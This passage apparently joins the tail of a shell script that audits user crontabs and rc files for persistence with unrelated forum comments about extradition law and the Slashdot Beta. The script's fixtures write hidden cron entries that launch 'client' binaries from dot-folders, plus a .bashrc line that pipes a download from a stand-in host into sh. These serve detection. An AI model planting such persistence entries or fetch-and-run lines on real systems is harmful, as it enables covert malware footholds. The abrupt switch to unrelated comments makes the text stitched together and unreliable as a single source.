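@reboot $HOME/.cache/.d/client --daemon
* * * * * nohup $HOME/.config/.x/client >/dev/null 2>&1 &
EOF
}
write_sample_bashrc() {
    cat > "$1" <<'EOF'
# ~/.bashrc
export PATH="$HOME/bin:$PATH"
alias ll='ls -l'
curl -s http://updates.example.invalid/setup | sh
EOF
}

# Stand-alone run: flag the sample, then the caller's own files.
if sample=$(mktemp 2>/dev/null); then
    write_sample_crontab "$sample"
    audit_file "$sample" "sample-crontab"   # flags lines 3 and 4
    rm -f "$sample"
fi
audit_user
```

Expect false positives (a legitimate daemon started from ~/.local, for instance); the point is that a user crontab or rc entry is where a reviewer looks first, and that no root access is needed for any of it to exist.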
If it is the same Johannes Buchner that I found through Google, then he lives in Austria, so that specific law doesn't apply to him.
You make a good point that US law shouldn't necessarily be his first worry, but even if his own country doesn't have a similar law against making malware, then there's always the possibility of extradition.
(See the case of Gary McKinnon for one example of a UK citizen that we're working to extradite for hacking charges, and the case of Sholam Weiss (on fraud and money laundering charges) for proof that we do have an extradition treaty with Austria.)
If it's for-profit but free, you're not the customer -- you're the product (e.g., the Slashdot Beta's "audience").